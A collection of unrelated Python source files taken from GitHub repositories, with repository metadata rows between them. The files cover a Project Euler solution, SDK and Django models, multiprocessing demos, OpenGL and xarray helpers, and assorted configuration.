Problem 46: https://projecteuler.net/problem=46
It was proposed by Christian Goldbach that every odd composite number can be
written as the sum of a prime and twice a square.
9 = 7 + 2 × 1^2
15 = 7 + 2 × 2^2
21 = 3 + 2 × 3^2
25 = 7 + 2 × 3^2
27 = 19 + 2 × 2^2
33 = 31 + 2 × 1^2
It turns out that the conjecture was false.
What is the smallest odd composite that cannot be written as the sum of a
prime and twice a square?
"""
from __future__ import annotations
import math
def is_prime(number: int) -> bool:
    """Checks to see if a number is a prime in O(sqrt(n)).

    A number is prime if it has exactly two factors: 1 and itself.

    >>> is_prime(0)
    False
    >>> is_prime(1)
    False
    >>> is_prime(2)
    True
    >>> is_prime(3)
    True
    >>> is_prime(27)
    False
    >>> is_prime(87)
    False
    >>> is_prime(563)
    True
    >>> is_prime(2999)
    True
    >>> is_prime(67483)
    False
    """
    # 2 and 3 are prime.
    if 1 < number < 4:
        return True
    # Negatives, 0, 1, even numbers and multiples of 3 are not primes.
    if number < 2 or number % 2 == 0 or number % 3 == 0:
        return False
    # Every remaining prime has the form 6k +/- 1, so test divisors in steps of 6.
    for candidate in range(5, int(math.sqrt(number) + 1), 6):
        if number % candidate == 0 or number % (candidate + 2) == 0:
            return False
    return True
# Precomputed once at import: every odd composite number in [3, 100001).
odd_composites = [num for num in range(3, 100001, 2) if not is_prime(num)]
def compute_nums(n: int) -> list[int]:
    """
    Returns a list of first n odd composite numbers which do
    not follow the conjecture.

    >>> compute_nums(1)
    [5777]
    >>> compute_nums(2)
    [5777, 5993]
    >>> compute_nums(0)
    Traceback (most recent call last):
        ...
    ValueError: n must be >= 0
    >>> compute_nums("a")
    Traceback (most recent call last):
        ...
    ValueError: n must be an integer
    >>> compute_nums(1.1)
    Traceback (most recent call last):
        ...
    ValueError: n must be an integer
    """
    if not isinstance(n, int):
        raise ValueError("n must be an integer")
    if n <= 0:
        raise ValueError("n must be >= 0")

    counterexamples = []
    for candidate in odd_composites:
        # Search for a prime p such that candidate = p + 2*i*i.
        i = 0
        while 2 * i * i <= candidate:
            if is_prime(candidate - 2 * i * i):
                break
            i += 1
        else:
            # No decomposition exists: the conjecture fails for this number.
            counterexamples.append(candidate)
        if len(counterexamples) == n:
            return counterexamples
    return []
def solution() -> int:
    """Return the smallest odd composite that breaks Goldbach's other conjecture."""
    return compute_nums(1)[0]
if __name__ == "__main__":
    # Print the answer when run as a script.
    print(f"{solution() = }")
| [
"noreply@github.com"
] | TheAlgorithms.noreply@github.com |
c95316ed88c4eb8b6507da52be9580434e57786d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_divination.py | 6d43fd05084eaeeb1cd6871ad852cdf779c77057 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 360 | py |
#calss header
class _DIVINATION():
def __init__(self,):
self.name = "DIVINATION"
self.definitions = [u'the skill or act of saying or discovering what will happen in the future']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
d254ebfbaeafdb969c9d4440d84ce4d00f4001b8 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/AlipayOfflineProviderIndirectisvActivityEffectModel.py | cac8ed6d796184997fe5f3aa98dbb056ba0bbc8a | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 2,002 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayOfflineProviderIndirectisvActivityEffectModel(object):
    """Payload model for the offline-provider indirect-ISV activity-effect API."""

    # Serialized field names, in output order.
    _FIELDS = ('effective_time', 'ext_info', 'merchant_id')

    def __init__(self):
        self._effective_time = None
        self._ext_info = None
        self._merchant_id = None

    @property
    def effective_time(self):
        return self._effective_time

    @effective_time.setter
    def effective_time(self, value):
        self._effective_time = value

    @property
    def ext_info(self):
        return self._ext_info

    @ext_info.setter
    def ext_info(self, value):
        self._ext_info = value

    @property
    def merchant_id(self):
        return self._merchant_id

    @merchant_id.setter
    def merchant_id(self, value):
        self._merchant_id = value

    def to_alipay_dict(self):
        """Serialize truthy fields, delegating to nested to_alipay_dict() methods."""
        params = dict()
        for field in AlipayOfflineProviderIndirectisvActivityEffectModel._FIELDS:
            value = getattr(self, field)
            if value:
                if hasattr(value, 'to_alipay_dict'):
                    params[field] = value.to_alipay_dict()
                else:
                    params[field] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a model instance from a dict; returns None for a falsy input."""
        if not d:
            return None
        o = AlipayOfflineProviderIndirectisvActivityEffectModel()
        for field in AlipayOfflineProviderIndirectisvActivityEffectModel._FIELDS:
            if field in d:
                setattr(o, field, d[field])
        return o
| [
"jishupei.jsp@alibaba-inc.com"
] | jishupei.jsp@alibaba-inc.com |
a9595644a256d97d832d311804226c979060f5e6 | 351fa4edb6e904ff1ac83c6a790deaa7676be452 | /misc/maxAreaOfCake/Solution.py | 3facaa570babac01ef0de3db2aefe3661017d523 | [
"MIT"
] | permissive | shahbagdadi/py-algo-n-ds | 42981a61631e1a9af7d5ac73bdc894ac0c2a1586 | f3026631cd9f3c543250ef1e2cfdf2726e0526b8 | refs/heads/master | 2022-11-27T19:13:47.348893 | 2022-11-14T21:58:51 | 2022-11-14T21:58:51 | 246,944,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 521 | py | from typing import List
class Solution:
def maxArea(self, h: int, w: int, horizontalCuts: List[int], verticalCuts: List[int]) -> int:
hc , vc = sorted(horizontalCuts) +[h], sorted(verticalCuts) + [w]
mh , p = 0 , 0
for h in hc :
mh = max(mh,h-p)
p = h
mw , p = 0 , 0
for w in vc :
mw = max(mw,w-p)
p = w
return mh * mw
s = Solution()
hc = [1,2,4]
vc = [1,3]
# hc = [3,1]
# vc = [1]
ans = s.maxArea(5,4,hc,vc)
print(ans) | [
"email.shanu@gmail.com"
] | email.shanu@gmail.com |
35289460658e0ee7b729775ed7615e52d9c16be0 | 1525eeb085814724cd2678d1d81871c5c4b6eaee | /urls.py | 9570812ad1ee668bdf30070e089f4461d26c9d29 | [] | no_license | djangorobert/datauploader | b6156b4de7490ae9669ce724f6f727d7b5a68a5c | 381edfc76b293038ccabea134face10f15ec1310 | refs/heads/master | 2020-03-28T07:17:45.135728 | 2018-09-13T15:41:21 | 2018-09-13T15:41:21 | 147,892,502 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | from django.conf.urls import url
from datauploader.views import UploadFileView, SubmissionListView
from datauploader import views
urlpatterns = [
url(r'^upload/$', UploadFileView.as_view(), name='upload'),
url(r'^list/$', SubmissionListView.as_view(), name='list'),
url(r'^(?P<pk>\d+)\$', views.SubmissionDetailView.as_view(), name='detail'),
url(r'^submitted/$', views.submitted, name='submitted'),
] | [
"djangocharm2020@gmail.com"
] | djangocharm2020@gmail.com |
1350572da4d56758a9a53a26cec9c22952a3686a | cecd66e056674fe0e8f83eb24f0f8f076304ef02 | /meidoo/meidoo/apps/payment/models.py | d05bd14d345e128c9c918f07188544b66e2394ce | [
"MIT"
] | permissive | amourbrus/meiduo_mall | 30b2aac92685df5ef119b57cb653ff5f7eabcb3a | 965b3d4685d1a8fe18a3177cc864f27eeb516081 | refs/heads/master | 2020-03-23T17:42:54.552801 | 2018-07-22T09:23:37 | 2018-07-22T09:23:37 | 141,871,772 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 537 | py | from django.db import models
# Create your models here.
from orders.models import OrderInfo
from meidoo.utils.models import BaseModel # check
class Payment(BaseModel):
"""
支付信息
"""
order = models.ForeignKey(OrderInfo, on_delete=models.CASCADE, verbose_name='订单')
trade_id = models.CharField(max_length=100, unique=True, null=True, blank=True, verbose_name="支付编号")
class Meta:
db_table = 'tb_payment'
verbose_name = '支付信息'
verbose_name_plural = verbose_name | [
"2338336776@qq.com"
] | 2338336776@qq.com |
1a8f4c33617b29b06b3d18836ddac3326c605b11 | 09e5cfe06e437989a2ccf2aeecb9c73eb998a36c | /modules/cctbx_project/libtbx/command_line/create_unzipsfx.py | 726675faa9cac376b1054e69d2966926e398a772 | [
"BSD-3-Clause-LBNL",
"BSD-3-Clause"
] | permissive | jorgediazjr/dials-dev20191018 | b81b19653624cee39207b7cefb8dfcb2e99b79eb | 77d66c719b5746f37af51ad593e2941ed6fbba17 | refs/heads/master | 2020-08-21T02:48:54.719532 | 2020-01-25T01:41:37 | 2020-01-25T01:41:37 | 216,089,955 | 0 | 1 | BSD-3-Clause | 2020-01-25T01:41:39 | 2019-10-18T19:03:17 | Python | UTF-8 | Python | false | false | 1,342 | py | from __future__ import absolute_import, division, print_function
import libtbx.path
import sys
buf_size = 1000000
def copy(src, dest):
while True:
buf = src.read(buf_size)
if (buf == ""): break
dest.write(buf)
def find_unzipsfx():
for command in ("unzipsfx_autorun_yes.exe",
"unzipsfx_autorun.exe",
"unzipsfx.exe"):
path_cmd = libtbx.path.full_command_path(
command=command, search_first=["."])
if (path_cmd is not None): return path_cmd
return None
def create(zip_file_name, path_unzipsfx_exe=None):
if (path_unzipsfx_exe is None):
path_unzipsfx_exe = find_unzipsfx()
if (path_unzipsfx_exe is None):
raise RuntimeError("Fatal: unzipsfx executable not found.")
assert zip_file_name.endswith(".zip")
exe_file_name = zip_file_name[:-4] + ".exe"
exe_file = open(exe_file_name, "wb")
copy(open(path_unzipsfx_exe, "rb"), exe_file)
copy(open(zip_file_name, "rb"), exe_file)
exe_file.close()
def run(args):
"usage: libtbx.create_unzipsfx [path_unzipsfx_exe] zip_file_name"
if (not len(args) in (1,2) or "-h" in args or "--help" in args):
print(run.__doc__)
return
if (len(args) == 1):
create(zip_file_name=args[0])
else:
create(zip_file_name=args[1], path_unzipsfx_exe=args[0])
if (__name__ == "__main__"):
run(sys.argv[1:])
| [
"jorge7soccer@gmail.com"
] | jorge7soccer@gmail.com |
a75a6a9fff392c36a2f7ea0a26ceb9742e30b997 | 1a2bf34d7fc1d227ceebf05edf00287de74259c5 | /flask/Day02/fisher.py | 1cc4adb358cfd1bff444552db2490d00e0e84b5b | [] | no_license | lzn9423362/Django- | de69fee75160236e397b3bbc165281eadbe898f0 | 8c1656d20dcc4dfc29fb942b2db54ec07077e3ae | refs/heads/master | 2020-03-29T18:03:47.323734 | 2018-11-28T12:07:12 | 2018-11-28T12:07:12 | 150,192,771 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | # 从flask框架中导入Flask这个类
from flask import Flask
#初始化一个flask对象
#需要传递一个参数__name__
# 1.方便flask框架去寻找资源
# 2.方便flask插件比如flask-Sqlalchemy出现错误的时候,好去寻找问题所在的位置
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'hello world'
#如果当前这个文件是作为入口程序运行,那么就执行app.run()
if __name__ == '__main__':
#启动一个应用服务器,来接受用户的请求
app.run(host='0.0.0.0') | [
"411121080@qq.com"
] | 411121080@qq.com |
a813c48c1eaee83257117b19fbeecd6ea97aaf61 | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/Vulkan/DescriptorSetLayoutBinding.py | 0479636cd1074bcea3d9e51d4a14b5da89e17818 | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 4,259 | py | # encoding: utf-8
# module gi.repository.Vulkan
# from /usr/lib64/girepository-1.0/Vulkan-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
class DescriptorSetLayoutBinding(__gi.Struct):
# no doc
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(DescriptorSetLayoutBinding), '__module__': 'gi.repository.Vulkan', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'DescriptorSetLayoutBinding' objects>, '__weakref__': <attribute '__weakref__' of 'DescriptorSetLayoutBinding' objects>, '__doc__': None})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(DescriptorSetLayoutBinding)
| [
"ttys3@outlook.com"
] | ttys3@outlook.com |
dc8ac8f98abdd3d2476ff6576232b08b43103914 | b6fc54cff7037f5e4ef26cb4a645d5ea5a6fecdf | /000000stepikProgBasKirFed/Stepik000000ProgBasKirFedсh01p03st06TASK06_20210205_datatypes.py | 117d126123441b6fb42d7d39b655d4b2bc394545 | [
"Apache-2.0"
] | permissive | SafonovMikhail/python_000577 | 5483eaf2f7c73bc619ce1f5de67d8d689d2e7dd4 | f2dccac82a37df430c4eb7425b5d084d83520409 | refs/heads/master | 2022-12-08T10:53:57.202746 | 2022-12-07T09:09:51 | 2022-12-07T09:09:51 | 204,713,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 504 | py | '''
Напишите программу, которая считывает две строки и выводит на экран конкатенацию этих строк
Примечание: конкатенация - операция "сложения" двух строк
Sample Input 1:
Язык программирования
Python
Sample Output 1:
Язык программированияPython
Sample Input 2:
37
81
Sample Output 2:
3781
'''
s1, s2 = input(), input()
print(s1 + s2)
| [
"ms33@inbox.ru"
] | ms33@inbox.ru |
6e8ee652e5e7b105b697cf9fdec23a5e025e1dee | 4a9dada02c749e9e5277fe1e35357d7b2b28ad5c | /郝嘉良2018013383/操作系统实验/作业3.py | 44b2f84b1cc0ec63e1941c65a01a64ac57e05c53 | [] | no_license | wanghan79/2020_Option_System | 631cc80f52829390a128a86677de527472470348 | f37b870614edf7d85320da197d932df2f25a5720 | refs/heads/master | 2021-01-09T13:10:05.630685 | 2020-07-10T03:30:39 | 2020-07-10T03:30:39 | 242,312,271 | 13 | 9 | null | 2020-07-04T16:13:11 | 2020-02-22T09:12:56 | Python | UTF-8 | Python | false | false | 4,488 | py | import multiprocessing
import threading
import logging
import time
# 1.多进程实例演示
def hello(i):
print('hello, im', i)
if __name__ == '__main__':
for i in range(10):
p = multiprocessing.Process(target=hello, args=(i,))
p.start()
# 2.多进程自定义进程名称
logging.basicConfig(
level=logging.DEBUG,
format="(%(threadName)-10s) %(message)s",
)
def worker():
name = multiprocessing.current_process().name
logging.debug('%s 开始' % name)
time.sleep(3)
logging.debug('%s 结束' % name)
def my_service():
name = multiprocessing.current_process().name
logging.debug('%s 开始' % name)
time.sleep(3)
logging.debug('%s 结束' % name)
if __name__ == '__main__':
service = multiprocessing.Process(
name='my_service',
target=my_service,
)
worker_1 = multiprocessing.Process(
name='worker_1',
target=worker,
)
worker_2 = multiprocessing.Process(
target=worker,
)
service.start()
worker_1.start()
worker_2.start()
# 3.守护进程无等待的方式
logging.basicConfig(
level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def daemon():
p = multiprocessing.current_process()
logging.debug('%s %s 开始' % (p.name, p.pid))
time.sleep(2)
logging.debug('%s %s 结束' % (p.name, p.pid))
def no_daemon():
p = multiprocessing.current_process()
logging.debug('%s %s 开始' % (p.name, p.pid))
logging.debug('%s %s 结束' % (p.name, p.pid))
if __name__ == '__main__':
daemon_obj = multiprocessing.Process(
target=daemon,
name='daemon'
)
daemon_obj.daemon = True
no_daemon_obj = multiprocessing.Process(
target=no_daemon,
name='no_daemon'
)
no_daemon_obj.daemon = False
daemon_obj.start()
time.sleep(1)
no_daemon_obj.start()
# 4.守护进程设置等待超时时间
logging.basicConfig(
level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def daemon():
p = multiprocessing.current_process()
logging.debug('%s %s 开始' % (p.name, p.pid))
time.sleep(2)
logging.debug('%s %s 结束' % (p.name, p.pid))
def no_daemon():
p = multiprocessing.current_process()
logging.debug('%s %s 开始' % (p.name, p.pid))
logging.debug('%s %s 结束' % (p.name, p.pid))
if __name__ == '__main__':
daemon_obj = multiprocessing.Process(
target=daemon,
name='daemon'
)
daemon_obj.daemon = True
no_daemon_obj = multiprocessing.Process(
target=no_daemon,
name='no_daemon'
)
no_daemon_obj.daemon = False
daemon_obj.start()
time.sleep(1)
no_daemon_obj.start()
daemon_obj.join(1)
logging.debug('daemon_obj.is_alive():%s' % daemon_obj.is_alive())
no_daemon_obj.join()
# 5.进程的终止,注意:terminate的时候,需要使用join()进程,保证进程成功终止
logging.basicConfig(
level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def slow_worker():
print('开始工作')
time.sleep(0.1)
print('结束工作')
if __name__ == '__main__':
p = multiprocessing.Process(
target=slow_worker
)
logging.debug('开始之前的状态%s' % p.is_alive())
p.start()
logging.debug('正在运行的状态%s' % p.is_alive())
p.terminate()
logging.debug('调用终止进程的状态%s' % p.is_alive())
p.join()
logging.debug('等待所有进程运行完成,状态%s' % p.is_alive())
# 6.进程退出状态码
def exit_error():
sys.exit(1)
def exit_ok():
return
def return_value():
return 1
def raises():
raise RuntimeError('运行时的错误')
def terminated():
time.sleep(3)
if __name__ == '__main__':
jobs = []
funcs = [
exit_error,
exit_ok,
return_value,
raises,
terminated,
]
for func in funcs:
print('运行进程的函数名 %s' % func.__name__)
j = multiprocessing.Process(
target=func,
name=func.__name__
)
jobs.append(j)
j.start()
jobs[-1].terminate()
for j in jobs:
j.join()
print('{:>15}.exitcode={}'.format(j.name, j.exitcode)) | [
"noreply@github.com"
] | wanghan79.noreply@github.com |
5e5a54d0191082f22946db5b5b2325b7c67c51d2 | 6e86e685d0469f131446c809c1478c8faf27a382 | /jhmanager/repo/users.py | 582b475baddd69a97050511ed92ca6afd4986e97 | [] | no_license | CardinisCode/jobhuntmanager | 551091e35ab30704c42191f3c35b2e91a5f7a704 | 23be1e10bdaaa9d203090fbbd9a44fe0472f8b18 | refs/heads/master | 2023-04-26T06:47:44.726364 | 2021-05-25T13:04:34 | 2021-05-25T13:04:34 | 317,517,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,453 | py | from jhmanager.repo.database import SqlDatabase
from datetime import date, time
from flask import flash
import sqlite3
class User:
def __init__(self, db_fields):
self.user_id = db_fields[0]
self.username = db_fields[1]
self.hash = db_fields[2]
self.email = db_fields[3]
self.date = db_fields[4]
class UserRepository:
def __init__(self, db):
self.db = db
def createUser(self, fields):
cursor = self.db.cursor()
command = """
INSERT INTO users
(username, hash, email, date)
VALUES (?, ?, ?, ?)
"""
result = cursor.execute(command, tuple(fields.values()))
self.db.commit()
return result.lastrowid
def getUserByID(self, user_id):
cursor = self.db.cursor()
result = cursor.execute("SELECT * FROM users WHERE user_id=?", (user_id,))
self.db.commit()
user_result = User(result.fetchone())
return user_result
def getUserByUsername(self, username):
cursor = self.db.cursor()
result = cursor.execute("SELECT * FROM users WHERE username=?", (username,))
self.db.commit()
return result.fetchone()
def getUserByEmail(self, email):
cursor = self.db.cursor()
result = cursor.execute("SELECT * FROM users WHERE email=?", (email,))
self.db.commit()
return result.fetchone()
def updateUserEmailByID(self, fields):
cursor = self.db.cursor()
command = """
UPDATE users
SET email = ?
WHERE user_id = ?
"""
cursor.execute(command, tuple(fields.values()))
self.db.commit()
def updateUserHashByID(self, fields):
cursor = self.db.cursor()
command = """
UPDATE users
SET hash = ?
WHERE user_id = ?
"""
cursor.execute(command, tuple(fields.values()))
self.db.commit()
def deleteUserByID(self, user_id):
message = ""
try:
cursor = self.db.cursor()
command = "DELETE FROM users WHERE user_id = {}".format(user_id)
cursor.execute(command)
self.db.commit()
message = "User details deleted successfully."
except sqlite3.Error as error:
message = "User details failed to delete. " + error
finally:
return message | [
"ac.folgado@gmail.com"
] | ac.folgado@gmail.com |
745e496a4d5f14874c52650c007e52a0330e2f34 | c0613b519124979d1de12614a9a7a745f9c9a66f | /xarray_leaflet/transform.py | 8d1eb0ac19ca7d3304887c784e7dc8a224b59fd8 | [
"MIT"
] | permissive | netgodz/xarray_leaflet | 1cccb67251dd81817c6893f47a55989846d03062 | d4c22781243e8e4900cd43a4479cfc932f68bdcf | refs/heads/master | 2023-07-16T15:15:47.090465 | 2021-08-06T20:16:46 | 2021-08-07T06:20:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | import warnings
import numpy as np
import xarray as xr
def passthrough(array, *args, **kwargs):
return array
def normalize(array, *args, **kwargs):
vmin = np.min(array).values
vmax = np.max(array).values
array = (array - vmin) / (vmax - vmin)
return array
def coarsen(agg_func=xr.core.rolling.DataArrayCoarsen.mean):
def _(array, *args, **kwargs):
tile_width = kwargs['tile_width']
tile_height = kwargs['tile_height']
if len(array.shape) > 2:
# it's an RGB array
array_2d = array.isel(rgb=0)
else:
array_2d = array
ny, nx = array_2d.shape
wx = nx // (tile_width * 2)
wy = ny // (tile_height * 2)
dim = {}
if wx > 1:
dim['x'] = wx
if wy > 1:
dim['y'] = wy
array = array.coarsen(**dim, boundary='pad')
# ignore "mean of empty slice" warning in np.nanmean
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=RuntimeWarning)
array = agg_func(array)
return array
return _
| [
"david.brochart@gmail.com"
] | david.brochart@gmail.com |
171345562deab9b5d2ed7d77b42ef9ca9b3a89fe | 9ce3385fb9829b70f191ea9478ebfe2dd4971c80 | /render/imdraw/quad.py | 896bbb74707bf37dfa00d1980753279e53e698b4 | [] | no_license | zalavariandris/editor | f3ffce9ae2bbd70fd9e9ce1b9ce8fc7bb23468a3 | 35b8941af12da58bb190967c28a78c91d5bb43dc | refs/heads/master | 2022-12-18T10:53:24.274321 | 2020-10-01T16:58:17 | 2020-10-01T16:58:17 | 283,721,461 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,952 | py | from OpenGL.GL import *
import numpy as np
from .helpers import buffer_offset
import logging
import functools
@functools.lru_cache(maxsize=128)
def quad_geo():
positions = np.array(
[(-1.0, +1.0, 0.0),
(-1.0, -1.0, 0.0),
(+1.0, +1.0, 0.0),
(+1.0, -1.0, 0.0)],
dtype=np.float32
)
uvs = np.array(
[(0.0, 1.0),
(0.0, 0.0),
(1.0, 1.0),
(1.0, 0.0)],
dtype=np.float32
)
logging.debug("create quad geo")
return positions, uvs
@functools.lru_cache(maxsize=128)
def create_buffer(program):
positions, uvs = quad_geo()
# setup VAO
vao = glGenVertexArrays(1)
pos_vbo, uv_vbo = glGenBuffers(2) # FIXME: use single vbo for positions and vertices
glBindVertexArray(vao)
position_location = glGetAttribLocation(program, 'position')
if position_location >= 0:
glBindBuffer(GL_ARRAY_BUFFER, pos_vbo)
glBufferData(GL_ARRAY_BUFFER, positions.nbytes, positions, GL_STATIC_DRAW)
glVertexAttribPointer(position_location, 3, GL_FLOAT, False, 0, buffer_offset(0))
glEnableVertexAttribArray(position_location)
glBindBuffer(GL_ARRAY_BUFFER, 0)
else:
logging.warning("no 'position' attribute")
uv_location = glGetAttribLocation(program, 'uv')
if uv_location>=0:
glBindBuffer(GL_ARRAY_BUFFER, uv_vbo)
glBufferData(GL_ARRAY_BUFFER, uvs.nbytes, uvs, GL_STATIC_DRAW)
glVertexAttribPointer(uv_location, 2, GL_FLOAT, False, 0, buffer_offset(0))
glEnableVertexAttribArray(uv_location)
glBindBuffer(GL_ARRAY_BUFFER, 0)
else:
logging.warning("no 'uv' attribute")
glBindVertexArray(0)
logging.debug("create quad buffer: {}".format(vao))
return vao
def quad(program):
vao = create_buffer(program)
# draw
glBindVertexArray(vao)
glDrawArrays(GL_TRIANGLE_STRIP, 0, 4)
glBindVertexArray(0)
| [
"zalavariandris@gmail.com"
] | zalavariandris@gmail.com |
0e1aab0283ba37b62180201b79ac72c433de0f15 | 165abb376cc4ead31e9b4d49c1a0f7c917f827ae | /ixc_django_docker/settings/haystack.py | 4dfae42c1548f375d65da4f19fb6a243db1fa4c2 | [] | no_license | ixc/ixc-django-docker | 8a04d0efa1d2ac0610b7c55facc6a210b6b6584d | 2f4302d8dd52ff0d1ad7a6f5973f70bcd808f283 | refs/heads/master | 2023-08-23T10:54:56.399455 | 2023-08-22T03:38:18 | 2023-08-22T03:38:18 | 74,635,795 | 6 | 1 | null | 2021-12-09T05:44:39 | 2016-11-24T03:45:17 | Shell | UTF-8 | Python | false | false | 476 | py | # Get host and port from the environment.
ELASTICSEARCH_ADDRESS = os.environ.get(
'ELASTICSEARCH_ADDRESS', 'localhost:9200')
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.elasticsearch2_backend.Elasticsearch2SearchEngine',
'INDEX_NAME': 'haystack-%s' % PROJECT_SLUG,
'URL': 'http://%s/' % ELASTICSEARCH_ADDRESS,
},
}
HAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.BaseSignalProcessor'
INSTALLED_APPS += ('haystack', )
| [
"real.human@mrmachine.net"
] | real.human@mrmachine.net |
516db0555bf68f2992a2c77c28f9bdf347708d9d | a4e6b080d17611853374577aaecb0367366b39b5 | /glycresoft_sqlalchemy/utils/data_files.py | 9692dd3d26e4eda167b518a3793d1736dbfd05e7 | [] | no_license | mobiusklein/glycresoft_sqlalchemy | 6235b1ea2c8da9ef6b2e725a60f0b6a925f1689d | e0edf12a8d6243cc2438a6236aa0564a28f92a8a | refs/heads/master | 2020-04-06T05:38:35.849225 | 2016-11-21T03:25:26 | 2016-11-21T03:25:26 | 37,537,754 | 0 | 2 | null | 2016-11-21T03:25:27 | 2015-06-16T15:10:45 | Python | UTF-8 | Python | false | false | 2,525 | py | import os
from functools import partial
from .vendor import sqlitedict, appdir
from glycresoft_sqlalchemy.report import colors
from glycresoft_sqlalchemy.structure.data import unimod
dirs = appdir.AppDirs("GlycReSoft", "Zaia Lab", "1.0", roaming=True)
pjoin = os.path.join
data_directory = dirs.user_data_dir
cache_directory = dirs.user_cache_dir
if not os.path.exists(data_directory):
os.makedirs(data_directory)
try:
invalidation_errors = [OSError, WindowsError]
except:
invalidation_errors = [OSError]
class ResourcePath(str):
valid = True
def invalidate(self):
self.valid = False
def validate(self):
if not self.valid:
if self.exists:
self.remove()
def remove(self):
try:
os.remove(self)
except invalidation_errors:
pass
@property
def exists(self):
return os.path.exists(self)
class Resource(object):
def __init__(self, name, path, **kwargs):
self.name = name
self.path = ResourcePath(path)
self.held = kwargs.get('held', False)
self.owners = kwargs.get('owners', set())
self.ready = kwargs.get("ready", False)
def __str__(self):
return self.path
def __repr__(self):
return "Resource(name=%r, path=%r)"
def acquired(self, owner):
if owner not in self.owners:
self.owners.add(owner)
def release(self, owner):
if owner not in self.owners:
raise ValueError("%r is not a valid owner" % owner)
self.owners.remove(owner)
if len(self.owners) == 0:
self.held = False
display_store = ResourcePath(pjoin(data_directory, "display_store.db"))
unimod_store = ResourcePath(pjoin(data_directory, "unimod.db"))
glycomedb_store = ResourcePath(pjoin(data_directory, "glycome-db.db"))
